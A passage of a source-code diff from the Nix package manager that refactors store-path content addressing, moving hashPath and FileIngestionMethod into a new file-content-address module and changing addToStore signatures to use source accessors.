ContentAddressWithReferences::fromPartsOpt( - outputHash.method, - std::move(got), - rewriteRefs()); - if (!optCA) { - // TODO track distinct failure modes separately (at the time of - // writing there is just one but `nullopt` is unclear) so this - // message can't get out of sync. - throw BuildError("output path '%s' has illegal content address, probably a spurious self-reference with text hashing"); - } ValidPathInfo newInfo0 { worker.store, outputPathName(drv->name, outputName), - std::move(*optCA), + ContentAddressWithReferences::fromParts( + outputHash.method, + std::move(got), + rewriteRefs()), Hash::dummy, }; if (*scratchPath != newInfo0.path) { @@ -2511,9 +2497,14 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string(newInfo0.path.hashPart())}}); } - HashResult narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); - newInfo0.narHash = narHashAndSize.first; - newInfo0.narSize = narHashAndSize.second; + { + PosixSourceAccessor accessor; + HashResult narHashAndSize = hashPath( + accessor, CanonPath { actualPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256); + newInfo0.narHash = narHashAndSize.first; + newInfo0.narSize = narHashAndSize.second; + } assert(newInfo0.ca); return newInfo0; @@ -2531,7 +2522,10 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string { scratchPath->hashPart() }, std::string { requiredFinalPath.hashPart() }); rewriteOutput(outputRewrites); - auto narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); + PosixSourceAccessor accessor; + HashResult narHashAndSize = hashPath( + accessor, CanonPath { actualPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256); ValidPathInfo newInfo0 { requiredFinalPath, narHashAndSize.first }; newInfo0.narSize = narHashAndSize.second; auto refs = rewriteRefs(); diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 9b8c36286..399ad47fd 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -519,7 +519,9 @@ bool Worker::pathContentsGood(const StorePath & path) if (!pathExists(store.printStorePath(path))) res = false; else { - HashResult current = hashPath(info->narHash.algo, store.printStorePath(path)); + HashResult current = hashPath( + *store.getFSAccessor(), CanonPath { store.printStorePath(path) }, + FileIngestionMethod::Recursive, info->narHash.algo); Hash nullHash(HashAlgorithm::SHA256); res = info->narHash == nullHash || info->narHash == current.first; } diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc index f42a13126..fc408f5af 100644 --- a/src/libstore/content-address.cc +++ b/src/libstore/content-address.cc @@ -50,6 +50,18 @@ std::string ContentAddressMethod::render(HashAlgorithm ha) const }, raw); } +FileIngestionMethod ContentAddressMethod::getFileIngestionMethod() const +{ + return std::visit(overloaded { + [&](const TextIngestionMethod & th) { + return FileIngestionMethod::Flat; + }, + [&](const FileIngestionMethod & fim) { + return fim; + } + }, raw); +} + std::string ContentAddress::render() const { return std::visit(overloaded { @@ -79,7 +91,7 @@ static std::pair parseContentAddressMethodP prefix = *optPrefix; } - auto parseHashType_ = [&](){ + auto parseHashAlgorithm_ = [&](){ auto hashTypeRaw = splitPrefixTo(rest, ':'); if (!hashTypeRaw) throw UsageError("content address hash must be in form ':', but found: %s", wholeInput); @@ -90,7 +102,7 @@ static std::pair parseContentAddressMethodP // Switch on prefix if (prefix == "text") { // No parsing of the ingestion method, "text" only support flat. - HashAlgorithm hashAlgo = parseHashType_(); + HashAlgorithm hashAlgo = parseHashAlgorithm_(); return { TextIngestionMethod {}, std::move(hashAlgo), @@ -100,7 +112,7 @@ static std::pair parseContentAddressMethodP auto method = FileIngestionMethod::Flat; if (splitPrefix(rest, "r:")) method = FileIngestionMethod::Recursive; - HashAlgorithm hashAlgo = parseHashType_(); + HashAlgorithm hashAlgo = parseHashAlgorithm_(); return { std::move(method), std::move(hashAlgo), @@ -176,13 +188,13 @@ ContentAddressWithReferences ContentAddressWithReferences::withoutRefs(const Con }, ca.method.raw); } -std::optional ContentAddressWithReferences::fromPartsOpt( - ContentAddressMethod method, Hash hash, StoreReferences refs) noexcept +ContentAddressWithReferences ContentAddressWithReferences::fromParts( + ContentAddressMethod method, Hash hash, StoreReferences refs) { return std::visit(overloaded { - [&](TextIngestionMethod _) -> std::optional { + [&](TextIngestionMethod _) -> ContentAddressWithReferences { if (refs.self) - return std::nullopt; + throw Error("self-reference not allowed with text hashing"); return ContentAddressWithReferences { TextInfo { .hash = std::move(hash), @@ -190,7 +202,7 @@ std::optional ContentAddressWithReferences::fromPa } }; }, - [&](FileIngestionMethod m2) -> std::optional { + [&](FileIngestionMethod m2) -> ContentAddressWithReferences { return ContentAddressWithReferences { FixedOutputInfo { .method = m2, diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh index 05234da38..6863ad260 100644 --- a/src/libstore/content-address.hh +++ b/src/libstore/content-address.hh @@ -4,6 +4,7 @@ #include #include "hash.hh" #include "path.hh" +#include "file-content-address.hh" #include "comparator.hh" #include "variant-wrapper.hh" @@ -31,22 +32,6 @@ namespace nix { */ struct TextIngestionMethod : std::monostate { }; -/** - * An enumeration of the main ways we can serialize file system - * objects. - */ -enum struct FileIngestionMethod : uint8_t { - /** - * Flat-file hashing. Directly ingest the contents of a single file - */ - Flat = 0, - /** - * Recursive (or NAR) hashing. Serializes the file-system object in Nix - * Archive format and ingest that - */ - Recursive = 1 -}; - /** * Compute the prefix to the hash algorithm which indicates how the * files were ingested. @@ -54,7 +39,7 @@ enum struct FileIngestionMethod : uint8_t { std::string makeFileIngestionPrefix(FileIngestionMethod m); /** - * An enumeration of all the ways we can serialize file system objects. + * An enumeration of all the ways we can content-address store objects. * * Just the type of a content address. Combine with the hash itself, and * we have a `ContentAddress` as defined below. Combine that, in turn, @@ -102,7 +87,15 @@ struct ContentAddressMethod * * The rough inverse of `parse()`. */ - std::string render(HashAlgorithm ha) const; + std::string render(HashAlgorithm ht) const; + + /** + * Get the underlying way to content-address file system objects. + * + * Different ways of hashing store objects may use the same method + * for hashing file systeme objects. + */ + FileIngestionMethod getFileIngestionMethod() const; }; @@ -266,11 +259,12 @@ struct ContentAddressWithReferences * * @param refs References to other store objects or oneself. * - * Do note that not all combinations are supported; `nullopt` is - * returns for invalid combinations. + * @note note that all combinations are supported. This is a + * *partial function* and exceptions will be thrown for invalid + * combinations. */ - static std::optional fromPartsOpt( - ContentAddressMethod method, Hash hash, StoreReferences refs) noexcept; + static ContentAddressWithReferences fromParts( + ContentAddressMethod method, Hash hash, StoreReferences refs); ContentAddressMethod getMethod() const; diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index a112d6d31..574263c68 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -403,22 +403,9 @@ static void performOp(TunnelLogger * logger, ref store, auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parse(camStr); auto hashAlgo = hashAlgo_; // work around clang bug FramedSource source(from); - // TODO this is essentially RemoteStore::addCAToStore. Move it up to Store. - return std::visit(overloaded { - [&](const TextIngestionMethod &) { - if (hashAlgo != HashAlgorithm::SHA256) - throw UnimplementedError("When adding text-hashed data called '%s', only SHA-256 is supported but '%s' was given", - name, printHashAlgo(hashAlgo)); - // We could stream this by changing Store - std::string contents = source.drain(); - auto path = store->addTextToStore(name, contents, refs, repair); - return store->queryPathInfo(path); - }, - [&](const FileIngestionMethod & fim) { - auto path = store->addToStoreFromDump(source, name, fim, hashAlgo, repair, refs); - return store->queryPathInfo(path); - }, - }, contentAddressMethod.raw); + // TODO these two steps are essentially RemoteStore::addCAToStore. Move it up to Store. + auto path = store->addToStoreFromDump(source, name, contentAddressMethod, hashAlgo, refs, repair); + return store->queryPathInfo(path); }(); logger->stopWork(); diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index c40c256bb..8b142ba2a 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -59,13 +59,14 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor { unsupported("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) override { unsupported("addToStore"); } StorePath addTextToStore( diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 7e82bae28..cd8bf24f8 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -13,6 +13,7 @@ #include "compression.hh" #include "signals.hh" #include "posix-fs-canonicalise.hh" +#include "posix-source-accessor.hh" #include #include @@ -1088,11 +1089,22 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, if (info.ca) { auto & specified = *info.ca; - auto actualHash = hashCAPath( - specified.method, - specified.hash.algo, - info.path - ); + auto actualHash = ({ + HashModuloSink caSink { + specified.hash.algo, + std::string { info.path.hashPart() }, + }; + PosixSourceAccessor accessor; + dumpPath( + *getFSAccessor(false), + CanonPath { printStorePath(info.path) }, + caSink, + specified.method.getFileIngestionMethod()); + ContentAddress { + .method = specified.method, + .hash = caSink.finish().first, + }; + }); if (specified.hash != actualHash.hash) { throw Error("ca hash mismatch importing path '%s';\n specified: %s\n got: %s", printStorePath(info.path), @@ -1115,8 +1127,13 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, } -StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) +StorePath LocalStore::addToStoreFromDump( + Source & source0, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { /* For computing the store path. */ auto hashSink = std::make_unique(hashAlgo); @@ -1166,25 +1183,21 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name delTempDir = std::make_unique(tempDir); tempPath = tempDir + "/x"; - if (method == FileIngestionMethod::Recursive) - restorePath(tempPath, bothSource); - else - writeFile(tempPath, bothSource); + restorePath(tempPath, bothSource, method.getFileIngestionMethod()); dump.clear(); } auto [hash, size] = hashSink->finish(); - ContentAddressWithReferences desc = FixedOutputInfo { - .method = method, - .hash = hash, - .references = { + auto desc = ContentAddressWithReferences::fromParts( + method, + hash, + { .others = references, // caller is not capable of creating a self-reference, because this is content-addressed without modulus .self = false, - }, - }; + }); auto dstPath = makeFixedOutputPathFromCA(name, desc); @@ -1207,11 +1220,8 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name if (inMemory) { StringSource dumpSource { dump }; - /* Restore from the NAR in memory. */ - if (method == FileIngestionMethod::Recursive) - restorePath(realPath, dumpSource); - else - writeFile(realPath, dumpSource); + /* Restore from the buffer in memory. */ + restorePath(realPath, dumpSource, method.getFileIngestionMethod()); } else { /* Move the temporary path we restored above. */ moveFile(tempPath, realPath); @@ -1389,7 +1399,10 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) for (auto & link : readDirectory(linksDir)) { printMsg(lvlTalkative, "checking contents of '%s'", link.name); Path linkPath = linksDir + "/" + link.name; - std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Nix32, false); + PosixSourceAccessor accessor; + std::string hash = hashPath( + accessor, CanonPath { linkPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first.to_string(HashFormat::Nix32, false); if (hash != link.name) { printError("link '%s' was modified! expected hash '%s', got '%s'", linkPath, link.name, hash); @@ -1696,42 +1709,6 @@ void LocalStore::queryRealisationUncached(const DrvOutput & id, } } -ContentAddress LocalStore::hashCAPath( - const ContentAddressMethod & method, const HashAlgorithm & hashAlgo, - const StorePath & path) -{ - return hashCAPath(method, hashAlgo, Store::toRealPath(path), path.hashPart()); -} - -ContentAddress LocalStore::hashCAPath( - const ContentAddressMethod & method, - const HashAlgorithm & hashAlgo, - const Path & path, - const std::string_view pathHash -) -{ - HashModuloSink caSink ( hashAlgo, std::string(pathHash) ); - std::visit(overloaded { - [&](const TextIngestionMethod &) { - readFile(path, caSink); - }, - [&](const FileIngestionMethod & m2) { - switch (m2) { - case FileIngestionMethod::Recursive: - dumpPath(path, caSink); - break; - case FileIngestionMethod::Flat: - readFile(path, caSink); - break; - } - }, - }, method.raw); - return ContentAddress { - .method = method, - .hash = caSink.finish().first, - }; -} - void LocalStore::addBuildLog(const StorePath & drvPath, std::string_view log) { assert(drvPath.isDerivation()); diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh index ee605b5a2..a8323fe5a 100644 --- a/src/libstore/local-store.hh +++ b/src/libstore/local-store.hh @@ -177,8 +177,13 @@ public: void addToStore(const ValidPathInfo & info, Source & source, RepairFlag repair, CheckSigsFlag checkSigs) override; - StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; + StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) override; StorePath addTextToStore( std::string_view name, @@ -350,19 +355,6 @@ private: void signPathInfo(ValidPathInfo & info); void signRealisation(Realisation &); - // XXX: Make a generic `Store` method - ContentAddress hashCAPath( - const ContentAddressMethod & method, - const HashAlgorithm & hashAlgo, - const StorePath & path); - - ContentAddress hashCAPath( - const ContentAddressMethod & method, - const HashAlgorithm & hashAlgo, - const Path & path, - const std::string_view pathHash - ); - void addBuildLog(const StorePath & drvPath, std::string_view log) override; friend struct LocalDerivationGoal; diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index b395453d1..a494e6ecc 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -2,6 +2,7 @@ #include "globals.hh" #include "signals.hh" #include "posix-fs-canonicalise.hh" +#include "posix-source-accessor.hh" #include #include @@ -146,7 +147,12 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, Also note that if `path' is a symlink, then we're hashing the contents of the symlink (i.e. the result of readlink()), not the contents of the target (which may not even exist). */ - Hash hash = hashPath(HashAlgorithm::SHA256, path).first; + Hash hash = ({ + PosixSourceAccessor accessor; + hashPath( + accessor, CanonPath { path }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first; + }); debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Nix32, true)); /* Check if this is a known hash. */ @@ -156,7 +162,12 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, if (pathExists(linkPath)) { auto stLink = lstat(linkPath); if (st.st_size != stLink.st_size - || (repair && hash != hashPath(HashAlgorithm::SHA256, linkPath).first)) + || (repair && hash != ({ + PosixSourceAccessor accessor; + hashPath( + accessor, CanonPath { linkPath }, + FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first; + }))) { // XXX: Consider overwriting linkPath with our valid version. warn("removing corrupted link '%s'", linkPath); diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index dd6347468..567776b67 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -502,8 +502,13 @@ ref RemoteStore::addCAToStore( } -StorePath RemoteStore::addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) +StorePath RemoteStore::addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + RepairFlag repair) { return addCAToStore(dump, name, method, hashAlgo, references, repair)->path; } diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh index f2e34c1a3..68824a737 100644 --- a/src/libstore/remote-store.hh +++ b/src/libstore/remote-store.hh @@ -82,10 +82,15 @@ public: RepairFlag repair); /** - * Add a content-addressable store path. Does not support references. `dump` will be drained. + * Add a content-addressable store path. `dump` will be drained. */ - StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, const StorePathSet & references = StorePathSet()) override; + StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) override; void addToStore(const ValidPathInfo & info, Source & nar, RepairFlag repair, CheckSigsFlag checkSigs) override; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 7f35e74af..5b4c6c765 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -232,22 +232,28 @@ StorePath StoreDirConfig::makeFixedOutputPathFromCA(std::string_view name, const } -std::pair StoreDirConfig::computeStorePathFromDump( - Source & dump, - std::string_view name, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - const StorePathSet & references) const +std::pair StoreDirConfig::computeStorePath( + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter) const { - HashSink sink(hashAlgo); - dump.drainInto(sink); - auto h = sink.finish().first; - FixedOutputInfo caInfo { - .method = method, - .hash = h, - .references = {}, + auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first; + return { + makeFixedOutputPathFromCA( + name, + ContentAddressWithReferences::fromParts( + method, + h, + { + .others = references, + .self = false, + })), + h, }; - return std::make_pair(makeFixedOutputPath(name, caInfo), h); } @@ -264,22 +270,19 @@ StorePath StoreDirConfig::computeStorePathForText( StorePath Store::addToStore( - std::string_view name, - const Path & _srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method, + HashAlgorithm hashAlgo, + const StorePathSet & references, + PathFilter & filter, + RepairFlag repair) { - Path srcPath(absPath(_srcPath)); auto source = sinkToSource([&](Sink & sink) { - if (method == FileIngestionMethod::Recursive) - dumpPath(srcPath, sink, filter); - else - readFile(srcPath, sink); + dumpPath(accessor, path, sink, method.getFileIngestionMethod(), filter); }); - return addToStoreFromDump(*source, name, method, hashAlgo, repair, references); + return addToStoreFromDump(*source, name, method, hashAlgo, references, repair); } void Store::addMultipleToStore( @@ -404,9 +407,13 @@ digraph graphname { fileSink -> caHashSink } */ -ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method, HashAlgorithm hashAlgo, - std::optional expectedCAHash) +ValidPathInfo Store::addToStoreSlow( + std::string_view name, + SourceAccessor & accessor, + const CanonPath & srcPath, + ContentAddressMethod method, HashAlgorithm hashAlgo, + const StorePathSet & references, + std::optional expectedCAHash) { HashSink narHashSink { HashAlgorithm::SHA256 }; HashSink caHashSink { hashAlgo }; @@ -425,7 +432,7 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, srcPath. The fact that we use scratchpadSink as a temporary buffer here is an implementation detail. */ auto fileSource = sinkToSource([&](Sink & scratchpadSink) { - dumpPath(srcPath, scratchpadSink); + accessor.dumpPath(srcPath, scratchpadSink); }); /* tapped provides the same data as fileSource, but we also write all the @@ -433,9 +440,11 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, TeeSource tapped { *fileSource, narSink }; NullParseSink blank; - auto & parseSink = method == FileIngestionMethod::Flat + auto & parseSink = method.getFileIngestionMethod() == FileIngestionMethod::Flat ? (ParseSink &) fileSink - : (ParseSink &) blank; + : method.getFileIngestionMethod() == FileIngestionMethod::Recursive + ? (ParseSink &) blank + : (abort(), (ParseSink &)*(ParseSink *)nullptr); // handled both cases /* The information that flows from tapped (besides being replicated in narSink), is now put in parseSink. */ @@ -452,21 +461,24 @@ ValidPathInfo Store::addToStoreSlow(std::string_view name, const Path & srcPath, if (expectedCAHash && expectedCAHash != hash) throw Error("hash mismatch for '%s'", srcPath); + ValidPathInfo info { *this, name, - FixedOutputInfo { - .method = method, - .hash = hash, - .references = {}, - }, + ContentAddressWithReferences::fromParts( + method, + hash, + { + .others = references, + .self = false, + }), narHash, }; info.narSize = narSize; if (!isValidPath(info.path)) { auto source = sinkToSource([&](Sink & scratchpadSink) { - dumpPath(srcPath, scratchpadSink); + accessor.dumpPath(srcPath, scratchpadSink); }); addToStore(info, *source); } diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 2c883ce97..fc0a82a73 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -427,22 +427,28 @@ public: * libutil/archive.hh). */ virtual StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, - HashAlgorithm hashAlgo = HashAlgorithm::SHA256, - PathFilter & filter = defaultPathFilter, - RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()); + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + PathFilter & filter = defaultPathFilter, + RepairFlag repair = NoRepair); /** * Copy the contents of a path to the store and register the * validity the resulting path, using a constant amount of * memory. */ - ValidPathInfo addToStoreSlow(std::string_view name, const Path & srcPath, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, - std::optional expectedCAHash = {}); + ValidPathInfo addToStoreSlow( + std::string_view name, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + std::optional expectedCAHash = {}); /** * Like addToStore(), but the contents of the path are contained @@ -453,9 +459,13 @@ public: * * \todo remove? */ - virtual StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, RepairFlag repair = NoRepair, - const StorePathSet & references = StorePathSet()) + virtual StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) { unsupported("addToStoreFromDump"); } /** diff --git a/src/libstore/store-dir-config.hh b/src/libstore/store-dir-config.hh index 8dafca096..0fc8ded9c 100644 --- a/src/libstore/store-dir-config.hh +++ b/src/libstore/store-dir-config.hh @@ -91,15 +91,17 @@ struct StoreDirConfig : public Config StorePath makeFixedOutputPathFromCA(std::string_view name, const ContentAddressWithReferences & ca) const; /** - * Read-only variant of addToStoreFromDump(). It returns the store - * path to which a NAR or flat file would be written. + * Read-only variant of addToStore(). It returns the store + * path for the given file sytem object. */ - std::pair computeStorePathFromDump( - Source & dump, + std::pair computeStorePath( std::string_view name, - FileIngestionMethod method = FileIngestionMethod::Recursive, + SourceAccessor & accessor, + const CanonPath & path, + ContentAddressMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, - const StorePathSet & references = {}) const; + const StorePathSet & references = {}, + PathFilter & filter = defaultPathFilter) const; /** * Preparatory part of addTextToStore(). diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc new file mode 100644 index 000000000..9917986f6 --- /dev/null +++ b/src/libutil/file-content-address.cc @@ -0,0 +1,49 @@ +#include "file-content-address.hh" +#include "archive.hh" + +namespace nix { + +void dumpPath( + SourceAccessor & accessor, const CanonPath & path, + Sink & sink, + FileIngestionMethod method, + PathFilter & filter) +{ + switch (method) { + case FileIngestionMethod::Flat: + accessor.readFile(path, sink); + break; + case FileIngestionMethod::Recursive: + accessor.dumpPath(path, sink, filter); + break; + } +} + + +void restorePath( + const Path & path, + Source & source, + FileIngestionMethod method) +{ + switch (method) { + case FileIngestionMethod::Flat: + writeFile(path, source); + break; + case FileIngestionMethod::Recursive: + restorePath(path, source); + break; + } +} + + +HashResult hashPath( + SourceAccessor & accessor, const CanonPath & path, + FileIngestionMethod method, HashAlgorithm ht, + PathFilter & filter) +{ + HashSink sink { ht }; + dumpPath(accessor, path, sink, method, filter); + return sink.finish(); +} + +} diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh new file mode 100644 index 000000000..8e93f5847 --- /dev/null +++ b/src/libutil/file-content-address.hh @@ -0,0 +1,56 @@ +#pragma once +///@file + +#include "source-accessor.hh" +#include "fs-sink.hh" +#include "util.hh" + +namespace nix { + +/** + * An enumeration of the main ways we can serialize file system + * objects. + */ +enum struct FileIngestionMethod : uint8_t { + /** + * Flat-file hashing. Directly ingest the contents of a single file + */ + Flat = 0, + /** + * Recursive (or NAR) hashing. Serializes the file-system object in + * Nix Archive format and ingest that. + */ + Recursive = 1, +}; + +/** + * Dump a serialization of the given file system object. + */ +void dumpPath( + SourceAccessor & accessor, const CanonPath & path, + Sink & sink, + FileIngestionMethod method, + PathFilter & filter = defaultPathFilter); + +/** + * Restore a serialization of the given file system object. + * + * @TODO use an arbitrary `ParseSink`. + */ +void restorePath( + const Path & path, + Source & source, + FileIngestionMethod method); + +/** + * Compute the hash of the given file system object according to the + * given method. + * + * The hash is defined as (essentially) hashString(ht, dumpPath(path)). + */ +HashResult hashPath( + SourceAccessor & accessor, const CanonPath & path, + FileIngestionMethod method, HashAlgorithm ht, + PathFilter & filter = defaultPathFilter); + +} diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc index 30456ae5c..502afbda2 100644 --- a/src/libutil/hash.cc +++ b/src/libutil/hash.cc @@ -367,15 +367,6 @@ HashResult HashSink::currentHash() } -HashResult hashPath( - HashAlgorithm ha, const Path & path, PathFilter & filter) -{ - HashSink sink(ha); - dumpPath(path, sink, filter); - return sink.finish(); -} - - Hash compressHash(const Hash & hash, unsigned int newSize) { Hash h(hash.algo); diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh index 7bed9e2bd..2fe9a53f5 100644 --- a/src/libutil/hash.hh +++ b/src/libutil/hash.hh @@ -168,14 +168,11 @@ Hash hashString(HashAlgorithm ha, std::string_view s); Hash hashFile(HashAlgorithm ha, const Path & path); /** - * Compute the hash of the given path, serializing as a Nix Archive and - * then hashing that. + * The final hash and the number of bytes digested. * - * The hash is defined as (essentially) hashString(ht, dumpPath(path)). + * @todo Convert to proper struct */ typedef std::pair HashResult; -HashResult hashPath(HashAlgorithm ha, const Path & path, - PathFilter & filter = defaultPathFilter); /** * Compress a hash to the specified number of bytes by cyclically diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc index d361dc0ac..0a0a3ab1a 100644 --- a/src/nix-store/nix-store.cc +++ b/src/nix-store/nix-store.cc @@ -13,6 +13,7 @@ #include "shared.hh" #include "graphml.hh" #include "legacy.hh" +#include "posix-source-accessor.hh" #include "path-with-outputs.hh" #include "posix-fs-canonicalise.hh" @@ -175,8 +176,12 @@ static void opAdd(Strings opFlags, Strings opArgs) { if (!opFlags.empty()) throw UsageError("unknown flag"); + PosixSourceAccessor accessor; for (auto & i : opArgs) - cout << fmt("%s\n", store->printStorePath(store->addToStore(std::string(baseNameOf(i)), i))); + cout << fmt("%s\n", store->printStorePath(store->addToStore( + std::string(baseNameOf(i)), + accessor, + CanonPath::fromCwd(i)))); } @@ -196,8 +201,14 @@ static void opAddFixed(Strings opFlags, Strings opArgs) HashAlgorithm hashAlgo = parseHashAlgo(opArgs.front()); opArgs.pop_front(); + PosixSourceAccessor accessor; for (auto & i : opArgs) - std::cout << fmt("%s\n", store->printStorePath(store->addToStoreSlow(baseNameOf(i), i, method, hashAlgo).path)); + std::cout << fmt("%s\n", store->printStorePath(store->addToStoreSlow( + baseNameOf(i), + accessor, + CanonPath::fromCwd(i), + method, + hashAlgo).path)); } @@ -541,7 +552,10 @@ static void registerValidity(bool reregister, bool hashGiven, bool canonicalise) if (canonicalise) canonicalisePathMetaData(store->printStorePath(info->path), {}); if (!hashGiven) { - HashResult hash = hashPath(HashAlgorithm::SHA256, store->printStorePath(info->path)); + HashResult hash = hashPath( + *store->getFSAccessor(false), CanonPath { store->printStorePath(info->path) }, + + FileIngestionMethod::Recursive, HashAlgorithm::SHA256); info->narHash = hash.first; info->narSize = hash.second; } diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 02de796b5..64a43ecfa 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -2,6 +2,7 @@ #include "common-args.hh" #include "store-api.hh" #include "archive.hh" +#include "posix-source-accessor.hh" using namespace nix; @@ -20,7 +21,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand { Path path; std::optional namePart; - FileIngestionMethod ingestionMethod = FileIngestionMethod::Recursive; + ContentAddressMethod caMethod = FileIngestionMethod::Recursive; CmdAddToStore() { @@ -48,7 +49,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand )", .labels = {"hash-mode"}, .handler = {[this](std::string s) { - this->ingestionMethod = parseIngestionMethod(s); + this->caMethod = parseIngestionMethod(s); }}, }); } @@ -57,36 +58,17 @@ struct CmdAddToStore : MixDryRun, StoreCommand { if (!namePart) namePart = baseNameOf(path); - StringSink sink; - dumpPath(path, sink); + PosixSourceAccessor accessor; - auto narHash = hashString(HashAlgorithm::SHA256, sink.s); + auto path2 = CanonPath::fromCwd(path); - Hash hash = narHash; - if (ingestionMethod == FileIngestionMethod::Flat) { - HashSink hsink(HashAlgorithm::SHA256); - readFile(path, hsink); - hash = hsink.finish().first; - } + auto storePath = dryRun + ? store->computeStorePath( + *namePart, accessor, path2, caMethod, 